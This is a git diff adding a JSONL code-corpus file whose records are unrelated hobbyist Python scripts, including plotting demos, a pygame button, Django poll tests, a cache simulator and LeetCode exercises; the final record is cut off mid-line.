diff --git "a/5888.jsonl" "b/5888.jsonl"
new file mode 100644
--- /dev/null
+++ "b/5888.jsonl"
@@ -0,0 +1,596 @@
+{"seq_id":"139593293","text":"# Python program to plot two or more lines and set the line markers\nimport matplotlib.pyplot as plt\n# x axis values\nx = [1,4,5,6,7]\n# y axis values\ny = [2,6,3,6,3]\n\n# plotting the points\nplt.plot(x, y, color='red', linestyle='dashdot', linewidth = 3,\n         marker='o', markerfacecolor='blue', markersize=12)\n# Set the y-limits of the current axes.\nplt.ylim(1,8)\n# Set the x-limits of the current axes.\nplt.xlim(1,8)\n\n# naming the x axis\nplt.xlabel('x - axis')\n# naming the y axis\nplt.ylabel('y - axis')\n\n# giving a title to my graph\nplt.title('Display marker')\n# function to show the plot\nplt.show()\n","sub_path":"Matplotlib/line_markers.py","file_name":"line_markers.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"592164365","text":"import functools\nimport operator\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras._impl.keras.layers import Conv2D\n\n\ndef get_orthogonal_basis(*dim):\n    \"\"\" Get the standard basis of a finite dimensional vector space\n\n    # Args.\n        *dim: a dimension of space\n    # Returns\n        list, basis vectors\n    \"\"\"\n\n    basis = [None] * functools.reduce(operator.mul, dim)\n    zero = np.zeros(shape=dim, dtype=np.float32)\n    for i, (pos, _) in enumerate(np.ndenumerate(zero)):\n        basis[i] = zero.copy()\n        basis[i][pos] = 1\n    return basis\n\n\ndef hs_norm(op, input_shape):\n    \"\"\" Hilbert-Schmidt norm of an operator on Hilbert space\n\n    # Args.\n        op: callable, an operator\n        input_shape: tuple,\n    # Returns\n        float, a value\n    \"\"\"\n\n    norm_square = 0.\n    base = np.zeros(shape=input_shape, dtype=np.float32)\n    prev_pos = None\n    for i, (pos, _) in enumerate(np.ndenumerate(base)):\n        if prev_pos is not None:\n            base[prev_pos] = 0.\n        base[pos] = 1\n        proj = op(base).flatten()\n        norm_square += np.dot(proj, proj)\n        prev_pos = pos\n\n    return np.sqrt(norm_square)\n\n\ndef tf_hs_norm(op, input_tensor):\n    \"\"\" Hilbert-Schmidt norm of an operator on Hilbert space\n\n    # Args.\n        op: callable, an operator\n        input_tensor: tf.Tensor,\n    # Returns\n        float, a value\n    \"\"\"\n\n    fh, fw, nc = input_tensor.shape[1:]  # (idx, height, width, channels)\n    base = tf.ones_like(input_tensor)\n    size = tf.reduce_prod(input_tensor.shape[1:])\n\n    def cond(i, x):\n        return i < size\n\n    base = tf.Variable(tf.zeros((1, fh, fw, nc)))\n\n    def body(i, x):\n        pos_nc = tf.floormod(i, nc)\n        rem = tf.floordiv(i, nc)\n        pos_fw = tf.floormod(rem, fw)\n        rem = tf.floordiv(rem, fw)\n        pos_fh = tf.floormod(rem, fh)\n        up = tf.scatter_nd_update(base, [(0, pos_fh, pos_fw, pos_nc)], [1])\n        down = tf.scatter_nd_update(base, [(0, pos_fh, pos_fw, pos_nc)], [0])\n        with tf.control_dependencies([up]):\n            proj = op(base)\n            delta = tf.reduce_sum(tf.pow(proj, 2))\n            argg = tf.argmax(base)\n            x = tf.Print(x, [i, pos_fh, pos_fw, pos_nc, x, proj, base, argg])\n\n        return i + 1, tf.add(x, delta)\n\n    norm = tf.constant(0.)\n    _, norm = tf.while_loop(cond, body, [0, norm], parallel_iterations=1)\n\n    return tf.sqrt(norm), base\n\n\nif __name__ == '__main__':\n    ip_tensor = tf.zeros_like((2, 2), dtype=tf.float32)\n\n    def operator(x):\n        return x + [[0, 1], [0, 0]]\n\n    model = Sequential()\n    model.add(Conv2D(3, (2, 2),\n                     input_shape=(4, 4, 2),\n                     kernel_initializer='glorot_uniform'))\n    ip_tensor = model.layers[0].input\n    print(model.layers[0].get_weights()[0])\n    def conv_op(x):\n        return model.layers[0](x)\n    data = np.ones([1, 4, 4, 2])\n    oo, ba = tf_hs_norm(conv_op, ip_tensor)\n    with tf.Session() as sess:\n        summ = tf.summary.FileWriter('looo', graph=sess.graph)\n        sess.run(tf.global_variables_initializer())\n        print(sess.run([oo, ba], feed_dict={ip_tensor: data}))\n        summ.flush()\n","sub_path":"rcp/norms.py","file_name":"norms.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"32268389","text":"# simpleButtonClass.py\n\nimport pygame\nfrom pygame.locals import *\n\n\nclass simpleButton:\n\n    # class that creates button objects\n\n    def __init__ (self, height, width, color, textColor, label, surf, position):\n\n        # define some values\n\n        self.SURF = surf\n        self.POS = position\n        self.BUTCOLOR = color\n        self.BUTGREY = (color[0] * .25, color[1] * .25, color[2] * .25)\n        self.HIGHLIGHTCOLOR = (color[0] + ((255 - color[0])//3),\n                               color[1] + ((255 - color[1])//3),\n                               color[2] + ((255 - color[2])//3))\n \n        self.TEXTCOLOR = textColor\n        self.BLACK = (0, 0, 0)\n\n        self.HEIGHT = height\n        self.WIDTH = width\n        self.RADIUS = self.HEIGHT//2\n        THEIGHT = int(self.HEIGHT * .72)\n\n        self.active = True\n        self.highlighted = False\n\n        BUTFONT = pygame.font.SysFont(\"Impact\", THEIGHT)\n        # Render a Text Surface\n        self.TEXTSURF = BUTFONT.render(label, True, textColor, None)\n\n        w, h = self.TEXTSURF.get_size()\n \n        self.XPOS = (self.WIDTH - w)//2\n        self.YPOS = int((self.HEIGHT - h)//2)\n        twidth = w\n\n        self.BUTTONSURF = pygame.Surface((self.WIDTH, self.HEIGHT), flags=SRCALPHA, depth=32)\n        self.BUTTONSURF.fill((0, 0, 0, 0))\n\n    def __buttonBG(self, color):\n\n        # create square with rounded corners\n \n        pygame.draw.circle(self.BUTTONSURF, color, (self.RADIUS, self.RADIUS),\n                           self.RADIUS)\n        pygame.draw.circle(self.BUTTONSURF, color,\n                           (self.WIDTH - self.RADIUS, self.RADIUS), self.RADIUS)\n\n        pygame.draw.rect(self.BUTTONSURF, color, Rect((self.RADIUS, 0), (self.WIDTH - 2 * self.RADIUS, self.HEIGHT)))\n\n    def __buttonText(self):\n\n        # Draw Text\n        self.BUTTONSURF.blit(self.TEXTSURF, (self.XPOS, self.YPOS))\n\n    def clicked(self, mouseXY):\n        yesORno = False\n        P1 = self.POS\n        P2 = (P1[0] + self.WIDTH, P1[1] + self.HEIGHT)\n        yesORno = (self.active and P1[0] <= mouseXY[0] <= P2[0] and\n                   P1[1] <= mouseXY[1] <= P2[1])\n\n        return yesORno\n\n    def Active(self):\n        self.active = True\n        return True\n\n    def InActive(self):\n        self.active = False\n        return False\n\n\n    def displayBut(self):\n \n        if self.active:\n            if self.highlighted:\n                self.__buttonBG(self.HIGHLIGHTCOLOR)\n                self.__buttonText()\n                self.SURF.blit(self.BUTTONSURF, self.POS)\n            else:\n                self.__buttonBG(self.BUTCOLOR)\n                self.__buttonText()\n                self.SURF.blit(self.BUTTONSURF, self.POS)\n\n \n##    if B1.clicked(mouseXY)\n##        B1.displayBut()\n##        setValue(dieobjlist)\n \n","sub_path":"gameCode/simpleButtonClass001.py","file_name":"simpleButtonClass001.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"279616042","text":"import keras\nfrom sklearn.preprocessing import LabelBinarizer\nimport numpy as np\n\n\n# Hyperparameters\n# nb_examples = 1400\nmax_features = 4\nmaxlen = 10000\nbatch_size = 30\n#embedding_dims = 50\nnb_filter = [20, 20]\nfilter_length = [50, 3]\nhidden_dims = 200\nnb_epoch = 10\n\n# Load data as one hot vector\n# A sequence should be in the string format\nseqs = ['ACTGATTA', 'ATTTAAAA']\nlb = LabelBinarizer()\nlb.fit(['A', 'T', 'C', 'G'])\n# Create an array of the entire example size\nX_train = np.zeros(shape=(1400, 100))\nfor i in range(len(seqs)):\n    X_train[i] = lb.transform(list(seq))\n\n# X_train should have shape (#examples, max_len) \ny_train = ...\n\n# Build layers:\n# Embedding -> Convolution -> pool -> hidden -> fully connected\ndef train_operon(dataset='',\n                 nb_filter=[20, 20],\n                 filter_length=[50, 3],\n                 max_features=4,\n                 maxlen=10000,\n                 batch_size=30,\n                 #embedding_dims=50,\n                 hidden_dims=200,\n                 nb_epoch=10):\n    # Model types: Sequential and functional. We use functional here (similar to\n    # theano functions\n\n    # Define input as having 10000 characters of size 4, where each dimension\n    # encodes the presence/absence of a character\n    main_input = Input(shape(maxlen,))\n\n    #Embedding(max_features, embedding_dims, input_length=maxlen, dropout=0.2))\n    conv_out = Lambda(one_hot_encoding, output_shape=[maxlen, max_features])(inputs)\n\n    for i in range(len(nb_filters)):\n\n        conv_out = Convolution1D(nb_filter=nb_filter[i],\n                                 filter_length=filter_length[i],\n                                 border_mode='valid',\n                                 activation='relu',\n                                 init='glorot_normal',\n                                 subsample_length=1)(conv_out)\n\n        conv_out = Dropout(0.1)(conv_out)\n        conv_out = MaxPooling1D(pool_length=pool_length)(conv_out)\n\n    # Hidden Layer\n    Hidden = Dense(hidden_dims)(conv_out)\n    Hidden = Dropout(0.5)(Hidden)\n    Hidden = Activation('relu')(Hidden)\n\n    # fully connected Layer\n    fully_connected = Dense(1)(Hidden)\n    main_output = Activation('softmax')(fully_connected)\n\n    model = Model(inputs=main_input, outputs=main_output)\n\n    model.compile(loss='binary_crossentropy',\n                  optimizer='rmsprop',\n                  metrics=['accuracy'])\n\n    print(model.summary())\n\n    model.fit(X_train, y_train,\n              batch_size=batch_size,\n              nb_epoch=nb_epoch,\n              validation_data=(X_test, y_test))\n\nif __name__ == '__main__':\n    train_operon(dataset='',\n                 nb_filters=[20, 20],\n                 filter_sizes=[50, 3])\n\n    #predict_operon(dataset='', start, end)\n","sub_path":"test_operon.py","file_name":"test_operon.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"525232524","text":"#!/bin/python3\n \ndef countNegatives(myList):\n    negativeNums = 0\n \n    for n in myList:\n        if int(n) < 0:\n            negativeNums = negativeNums + 1\n    return negativeNums\n\ndef getBiggestNeg(myList):\n    maxNeg = -1000\n    for x in myList:\n        if int(x) < 0 and int(x) > maxNeg:\n            maxNeg = int(x)\n    return maxNeg\n\ndef isAllZeroes(myList):\n    allZeroes = True\n    for n in myList:\n        if int(n) != 0:\n            allZeroes = False\n    return allZeroes\n\ndef findMaxProduct(myList):\n    # Check for zeroes:\n    if isAllZeroes(xs):\n        return str(0)\n \n    # If there are an odd number of negatives, we'll need to remove one of em\n    if(countNegatives(xs) % 2 != 0):\n        maxNeg = getBiggestNeg(xs)\n        xs.remove(str(maxNeg)) # need to force it to int\n\n    # Actually do the calculations:\n    product = 1\n    for x in xs:\n        y = int(x)\n        if y != 0 and abs(y) <= 1000:\n            product = product * y\n    return product\n \n#---------------------------------------------------\nxs = input().strip().split(\",\")\n\nif len(xs) > 50:\n    print(\"Error - only 50 length allowed\")\nelse:\n    print(findMaxProduct(xs))","sub_path":"CodeKatas/python/powerHungry.py","file_name":"powerHungry.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"97077704","text":"### filterByState.py ###\n#\n# Filters out aggregate data for specific states\n#\n\nimport sys\n\nstates = []\nif len(sys.argv) > 1:\n    for i in range(1, len(sys.argv)):\n        states.append(sys.argv[i])\n\nfor line in sys.stdin:\n    data = line.split(\"\\t\")\n    state = (data[0])[-2:]\n    if state in states:\n        print(line.strip())\n\n","sub_path":"filterByState.py","file_name":"filterByState.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"466366342","text":"from datetime import timedelta\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils.datetime_safe import date\nfrom rest_framework.status import (HTTP_200_OK, HTTP_201_CREATED,\n                                   HTTP_400_BAD_REQUEST)\nfrom rest_framework.test import APITestCase\n\nfrom polls.models import AnswerOption, Poll, Question, User\n\n\nclass PollTestCase(TestCase):\n    def setUp(self) -> None:\n        self.today = date.today()\n        Poll.objects.create(name='Проверочный опрос', start_date=self.today,\n                            end_date=self.today,\n                            description='Описание для опроса')\n\n    def test_poll_has_correct_str_view(self):\n        poll = Poll.objects.get(name='Проверочный опрос')\n        expected_result = f'Проверочный опрос ({self.today} - {self.today})'\n        self.assertEqual(str(poll), expected_result)\n\n\nclass QuestionTestCase(TestCase):\n    def setUp(self) -> None:\n        poll = Poll.objects.create(\n            name='Проверочный опрос', start_date=date.today(),\n            end_date=date.today(), description='Описание для опроса')\n        Question.objects.create(text='Что должно здесь быть?',\n                                type=Question.TypeChoices.TEXT_ANSWER,\n                                poll=poll)\n\n    def test_question_has_correct_str_view(self):\n        text = 'Что должно здесь быть?'\n        question = Question.objects.get(text=text)\n        self.assertEqual(str(question), f'TEXT_ANSWER: {text}')\n\n\nclass AnswerOptionTestCase(TestCase):\n    def setUp(self) -> None:\n        poll = Poll.objects.create(name='Проверочный опрос',\n                                   start_date=date.today(),\n                                   end_date=date.today(),\n                                   description='Описание для опроса')\n        question = Question.objects.create(\n            text='Что должно здесь быть?',\n            type=Question.TypeChoices.TEXT_ANSWER, poll=poll)\n        AnswerOption.objects.create(question=question, content='Django')\n\n    def test_answer_option_has_correct_view(self):\n        content = 'Django'\n        answer_option = AnswerOption.objects.get(content=content)\n        self.assertEqual(str(answer_option), content)\n\n\nclass ActivePollsTestCase(APITestCase):\n    def setUp(self) -> None:\n        User.objects.create_user('test')\n\n        poll = Poll.objects.create(name='Проверочный опрос',\n                                   start_date=date.today(),\n                                   end_date=date.today(),\n                                   description='Описание для опроса')\n        yesterday = date.today() - timedelta(days=1)\n        Poll.objects.create(name='Неактивный опрос', start_date=yesterday,\n                            end_date=yesterday,\n                            description='Описание для опроса')\n\n        self.text_answer_question = Question.objects.create(\n            text='Как работают Middleware?',\n            type=Question.TypeChoices.TEXT_ANSWER, poll=poll)\n\n        self.single_answer_question = Question.objects.create(\n            text='Django или Flask?', type=Question.TypeChoices.SINGLE_ANSWER,\n            poll=poll)\n        AnswerOption.objects.create(question=self.single_answer_question,\n                                    content='Django')\n        AnswerOption.objects.create(question=self.single_answer_question,\n                                    content='Flask')\n\n        self.several_options_answer_question = Question.objects.create(\n            text='Какие возможности в Django?',\n            type=Question.TypeChoices.SEVERAL_OPTIONS_ANSWER,\n            poll=poll)\n        AnswerOption.objects.create(\n            question=self.several_options_answer_question, content='ASGI')\n        AnswerOption.objects.create(\n            question=self.several_options_answer_question, content='WSGI')\n        AnswerOption.objects.create(\n            question=self.several_options_answer_question, content='ML')\n\n    def test_polls_are_active(self):\n        url = reverse('active_polls')\n        response = self.client.get(url)\n        expected_response = [\n            {'id': 3, 'question_set': [\n                {'id': 4, 'text': 'Как работают Middleware?',\n                 'type': 'TEXT_ANSWER'},\n                {'id': 5, 'text': 'Django или Flask?',\n                 'type': 'SINGLE_ANSWER'},\n                {'id': 6, 'text': 'Какие возможности в Django?',\n                 'type': 'SEVERAL_OPTIONS_ANSWER'}],\n             'name': 'Проверочный опрос', 'start_date': str(date.today()),\n             'end_date': str(date.today()),\n             'description': 'Описание для опроса'}]\n\n        self.assertListEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_200_OK)\n\n\n    def test_answer_by_question_type(self):\n        url = reverse('create_answer')\n\n        response = self.client.post(\n            url, data={'user': 1, 'question': self.text_answer_question.id})\n        expected_response = {\n            'non_field_errors': ['Недопустимое количество ответов на '\n                                 'вопрос.']}\n        self.assertDictEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n        response = self.client.post(\n            url, data={'user': 1, 'question': self.text_answer_question.id,\n                       'text': 'Какой-то текст', 'choices': [1, 2]})\n        self.assertDictEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n        response = self.client.post(url,\n            data={'user': 1, 'question': self.text_answer_question.id,\n                  'text': '', 'choices': [1, 2]})\n        expected_response = {\n            'non_field_errors': ['Для указанного вопроса отсутствует '\n                                 'ответ в виде текста.']}\n        self.assertDictEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n        response = self.client.post(\n            url, data={'user': 1, 'question': self.single_answer_question.id,\n                       'text': '', 'choices': [1, 2]})\n        expected_response = {\n            'non_field_errors': ['Для указанного вопроса слишком много '\n                                 'выбранных вариантов ответа.']}\n        self.assertDictEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n        response = self.client.post(url,\n            data={'user': 1,\n                  'question': self.several_options_answer_question.id,\n                  'text': 'Какой-то текст.', 'choices': []})\n        expected_response = {\n            'non_field_errors': ['Для указанного вопроса не указан ни '\n                                 'один вариант ответа.']}\n        self.assertDictEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n        response = self.client.post(\n            url, data={'user': 1,\n                       'question': self.several_options_answer_question.id,\n                       'text': '', 'choices': [2, 3, 4]})\n        expected_response = {\n            'non_field_errors': ['Указанный вариант ответа недоступен '\n                                 'для этого вопроса.']}\n        self.assertDictEqual(response.json(), expected_response)\n        self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n        good_response = self.client.post(\n            url, data={'user': 1, 'question': self.single_answer_question.id,\n                       'choices': [1]})\n        expected_response = {'id': 1, 'text': '', 'user': 1, 'question': 2,\n                             'choices': [1]}\n        self.assertDictEqual(good_response.json(), expected_response)\n        self.assertEqual(good_response.status_code, HTTP_201_CREATED)\n","sub_path":"source/polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"213503396","text":"import configparser, cache, argparse, logging, pprint, datetime\nimport simpy, threading, multiThread, event\nfrom cache import Cache\nfrom traceParser import * \nfrom dataCenter import DataCenter \nfrom scheduler import Scheduler \nimport timeit\nimport cProfile\nimport pstats\nimport io\n\nif __name__ == '__main__':\n    start = timeit.default_timer()\n    parser = argparse.ArgumentParser(description='Simulate a cache')\n    #parser.add_argument('-t','--trace-file', help='Storage access trace file', required=True)\n    parser.add_argument('-c','--config-file', help='Configuration file for datacenter topology', required=True)\n    arguments = vars(parser.parse_args())\n    #trace_file = arguments['trace_file']\n \n    config = configparser.ConfigParser()\n    config.read_file(open(arguments['config_file']))\n\n    log_filename = 'wb_sim.log'\n    with open(log_filename, 'w'):\n        pass\n    logger = logging.getLogger()\n    fh = logging.FileHandler(log_filename)\n    logger.addHandler(fh)\n    logger.setLevel(logging.DEBUG)\n \n    logger.info('Loading config...')\n    print ('Loading config...')\n \n    logger.info('Creating Enviroment...')\n    print ('Creating Enviroment...') \n    env = simpy.Environment()\n    #directory = {}\n    dc = DataCenter(\"datacenter1\")\n    dc.build(config, logger, env) \n    #dc.scheduler = Scheduler(dc.compute_nodes, dc.cpu, dc.blk_dir, dc.mapper_list, dc.cache_layer, dc.jobStat, dc.mapper_size, dc.chunk_size)\n    dc.scheduler = Scheduler(dc.compute_nodes, dc.cpu, dc.blk_dir, dc.mapper_list, dc.cache_layer, dc.mapper_size, dc.chunk_size)\n \n \n    racks = int(config.get('Simulation', 'cache nodes'))\n    logger.info('Parsing Trace File...')\n\n    #df = {}\n    print(\"Parsing Trace File...\")\n    for i in range(racks):\n        trace_file = config.get('Simulation', 'traceFile'+str(i))\n        logger.info('Generating Final Trace File...')\n        print(\"Generating Final Trace File...\")\n        dc.scheduler.addJobs(i, trace_file, dc) \n        #df[i] = traceParser(trace_file)\n    #print(dc.setKeys)\n\n    logger.info('Running Simulation')\n    print('Running Simulation')\n \n    # Thread pool for mappers\n    \"\"\"\n    print(len(dc.mapper_list.keys()))\n    pool = multiThread.ThreadPool(len(dc.mapper_list.keys()))\n    for i in dc.mapper_list.keys():\n        pool.add_task(event.request_generator, i, dc, dc.scheduler, env)\n\n    \"\"\"\n    for i in dc.mapper_list:\n        event.request_generator(i, dc, dc.scheduler, env)\n\n    policy = config.get('Simulation', 'cache policy')\n    #if policy == \"LORE\":\n    #    pool.add_task(event.agingFunc, dc, env, dc.interval)\n\n\n    #pool.add_task(event.cleanUpDir, dc, env, float(config.get('Directory', 'cleanup interval')))\n\n    #pool.wait_completion()\n    #env.run(until = config.get('Simulation', 'end'))\n\n    \"\"\"\n    pr = cProfile.Profile()\n    pr.enable()\n\n    env.run()\n\n    pr.disable()\n    s = io.StringIO()\n    ps = pstats.Stats(pr, stream=s).sort_stats('tottime')\n    ps.print_stats()\n\n    with open('40000.txt', 'w+') as f:\n        f.write(s.getvalue())\n\n    \"\"\"\n    env.run()\n\n    print('----------Datalake ----------')\n    print(\"Datalake access is %s\" %(dc.dl_access))\n    hit_count = 0\n    hit_size_count = 0\n    miss_count = 0\n    miss_size_count = 0\n    local_count = 0\n    local_size_count = 0\n    remote_count = 0\n    remote_size_count = 0\n    for i in range(dc.c_nodes):\n        c_name = \"cache\"+str(i) #i is rack id\n        #hit_count += dc.cache_layer[c_name].hit_count\n        local_count += dc.cache_layer[c_name].local_hit\n        local_size_count += dc.cache_layer[c_name].local_size_hit\n        remote_count += dc.cache_layer[c_name].remote_hit\n        remote_size_count += dc.cache_layer[c_name].remote_size_hit\n        miss_count += dc.cache_layer[c_name].miss_count\n        miss_size_count += dc.cache_layer[c_name].miss_size_count\n        #print(\"HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].hit_count))\n        print(\"Local HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].local_hit))\n        print(\"Local BYTE HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].local_size_hit))\n        print(\"Remote HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].remote_hit))\n        print(\"Remote BYTE HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].remote_size_hit))\n        print(\"MISS COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].miss_count))\n        print(\"BYTE MISS COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].miss_size_count))\n        #dc.cache_layer[c_name].print()\n    print(\"Total Object Hit count is %d\" %(local_count+remote_count))\n    print(\"Total BYTE Hit count is %d\" %(local_size_count+remote_size_count))\n    print(\"Total Local Object Hit count is %d\" %local_count)\n    print(\"Total Local BYTE Hit count is %d\" %local_size_count)\n    print(\"Total Remote Object Hit count is %d\" %remote_count)\n    print(\"Total Remote BYTE Hit count is %d\" %remote_size_count)\n    print(\"Total Object Miss count is %d\" %miss_count)\n    print(\"Total BYTE Miss count is %d\" %miss_size_count)\n    print(\"Runtime is: \", dc.scheduler.endTime)\n    stop = timeit.default_timer()\n    print('Time: ', stop - start)\n# s_thread.join()\n","sub_path":"wb_sim.py","file_name":"wb_sim.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"621070411","text":"import re\nfrom collections import defaultdict\n\nclass Solution:\n    def twoSum(self, nums, target):\n        result = []\n        for i in range(len(nums)):\n            for j in range(1, len(nums)):\n                if ((i+j) == target):\n                    result.append(i)\n                    result.append(j)\n        return result\n\n    # def addTwoNumbers(self, l1, l2):\n    #     c = 0\n    #     head = ListNode(-1)\n    #     last = head\n    #\n    #     while l1 != None or l2 != None:\n    #         num = c\n    #         if(l1 != None):\n    #             num, l1 = num + l1.val, l1.next\n    #         if(l2 != None):\n    #             num, l2 = num + l2.val, l2.next\n    #\n    #         c = num // 10\n    #         num = num % 10\n    #\n    #         new_node = ListNode(num)\n    #         new_node.next = None\n    #         last.next = new_node\n    #         last = new_node\n    #\n    #     if(c > 0):\n    #         new_node = ListNode(c)\n    #         last.next = new_node\n    #         last = new_node\n    #\n    #     return head.next\n\n\n    def lengthOfLongestSubstring(self, s):\n        substring, length, max_len = \"\", 0, 0\n        for c in s:\n            if c in substring:\n                index = substring.find(c)\n                substring = substring[(index + 1)::]\n\n            substring += c\n            length = len(substring)\n\n            if length > max_len:\n                max_len = length\n\n        return max_len\n\n    def findMedianSortedArrays(self, nums1, nums2):\n        combList = nums1 + nums2\n        combList.sort()\n        listSize = len(combList)\n\n        if (listSize%2 == 0):\n            val1 = combList[(listSize//2) - 1]\n            val2 = combList[listSize//2]\n            return ((val1 + val2) / 2)\n\n        return float(combList[listSize//2])\n\n    def longestPalindrome(self, s: str):\n        curr = \"\"\n        temp = \"\"\n\n        if len(s) <= 1:\n            return \"\"\n\n        for idx in range(len(s)):\n            temp += s[idx]\n            for letter in s[idx+1:]:\n                if letter == temp[0]:\n                    temp += letter\n                    if len(temp) > len(curr):\n                        curr = temp\n                        temp = \"\"\n                        break\n                    else:\n                        temp = \"\"\n                        break\n                else:\n                    temp += letter\n            temp = \"\"\n\n        return curr\n\n    def convert(self, s, numRows):\n        if numRows <= 1:\n            return s\n\n        matrix = []\n\n    def myAtoi(self, str: str) -> int:\n        num = ''\n        str = str.lstrip(' ')\n\n        if (not str):\n            return 0\n\n        if (str[0] == '-' or str[0] == '+'):\n            num = str[0]\n            str = str[1:]\n\n        # check digits\n        for ch in str:\n            if (ch.isdigit()):\n                num += ch\n            else:\n                break\n\n        try:\n            value = int(num)\n            #check overflow\n            if (value.bit_length() >= 32):\n                return (2**31-1) if value > 0 else -2**31\n            return value\n        except ValueError:\n            return 0\n\n    def isPalindrome(self, x: int) -> bool:\n        num = str(x)\n        for i in range(len(num)):\n            if num[i] != num[-1 - i]:\n                return False\n            if i >= (len(num)/2):\n                return True\n        return True\n\n    def isMatch(self, s: str, p: str) -> bool:\n        pattern = \"^(\" + p + \")$\"\n        if re.match(pattern,s):\n            return True\n        else:\n            return False\n\n    def maxArea(self, height: [int]) -> int:\n        l = 0\n        r = len(height) -1\n        mArea = 0\n\n        while l < r:\n            hr, hl = height[r], height[l]\n            mArea = max(mArea, (r-l) * min(hr,hl))\n\n            if hr < hl:\n                r -= 1\n            else:\n                l += 1\n        return mArea\n\n    def intToRoman(self, num: int) -> str:\n        romanNumber = {\n            1000: \"M\", 900: \"CM\", 500: \"D\", 400: \"CD\", 100: \"C\",\n            90: \"XC\", 50: \"L\", 40: \"XL\", 10: \"X\", 9: \"IX\",\n            5: \"V\", 4: \"IV\", 1: \"I\"\n        }\n        ans = \"\"\n\n        if num < 1 or num > 3999:\n            return \"\"\n\n        while num != 0:\n            for i in romanNumber:\n                if num >= i:\n                    num -= i\n                    ans += romanNumber[i]\n                    break\n\n        return ans\n\n    def romanToInt(self, s: str) -> int:\n        ans,idx = 0, 0\n        romanNumber = {\n            \"M\":1000, \"CM\":900, \"D\":500, \"CD\":400, \"C\":100,\n            \"XC\":90, \"L\":50, \"XL\":40, \"X\":10, \"IX\":9,\n            \"V\":5, \"IV\":4, \"I\":1\n        }\n\n        while idx <= len(s) - 2:\n            if (s[idx]+s[idx+1] in romanNumber):\n                print(idx, s[idx]+s[idx+1])\n                ans += romanNumber[(s[idx]+s[idx+1])]\n                idx += 2\n            else:\n                print(idx, s[idx])\n                ans += romanNumber[s[idx]]\n                idx += 1\n\n        if idx == len(s) - 1:\n            ans += romanNumber[s[idx]]\n\n        return ans\n\n    def longestCommonPrefix(self, strs: [str]) -> str:\n        comPrefix = defaultdict(int)\n        return \"\"\n\nif __name__ == \"__main__\":\n    leetCode = Solution()\n    print(leetCode.longestCommonPrefix([\"flower\",\"flow\",\"flight\"]))\n","sub_path":"LeetCode.py","file_name":"LeetCode.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"22976171","text":"'''\nUses unrestricted partitions to find physical variables and plots.\nPatrick McMillin\nPHYS 431, Dr. Taheri\nLast modified: 5 December 2017\n'''\n'''\nSection 3.3 outlines the 'centered-difference' procedure. T = dU/dS\nfor the ith value of T: T[i] = (U[i+1]-U[i-1]) / (S[i+1]-S[i-1])\nSimilarly, we can generate Cv in a loop by calculating Cv = dU/dT\nCv[i] = (U[i+1]-U[i-1]) / (T[i+1]-T[i-1])\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Script written to find the partitions\nimport Unrestricted_Partitions\n# Calls function to generate partitions and assigns them to a list.\nPartitions = Unrestricted_Partitions.Generate_Unrestricted_Partitions()\n# Energy levels are just the numerical values we found the\n# unrestricted partitions for (i.e. the numbers 0 through 100).\n# For simplicity, $\\eta$ = k = 1.\nEnergy = range(0,101)\nEntropy = []\n# Takes the logarithm of all microstates to find S/k.\nfor i in Partitions:\n    Entropy.append(np.log(i))\nTemperature = [0]\nHeat_Capacity = [0]\n# Temperatures\nfor i in range(1,(len(Energy)-1)): # NOTE: len()-1 since we will not have a Energy[101]\n    Temperature.append((Energy[i+1]-Energy[i-1]) / (Entropy[i+1]-Entropy[i-1]))\n# Heat capacities\nfor i in range(1,(len(Energy)-2)): # NOTE: len()-1 since we will not have a Temperature[100]\n    Heat_Capacity.append((Energy[i+1]-Energy[i-1]) / (Temperature[i+1]-Temperature[i-1]))\ndel Temperature[0]\nplt.figure(1)\nplt.scatter(Temperature, Heat_Capacity)\nplt.title('Heat Capacity (C/k) vs Temperature (kT/$\\eta$)')\nplt.xlabel('Temperature (kT/$\\eta$)')\nplt.ylabel('Heat Capacity (C/k)')\nplt.savefig('T_vs_Cv.pdf')\n\nplt.figure(2)\nTemp_List = np.linspace(1,9,100)\nRamanujan_Heat_Capacity_Coefficient = ((np.pi)**2)/3\nP 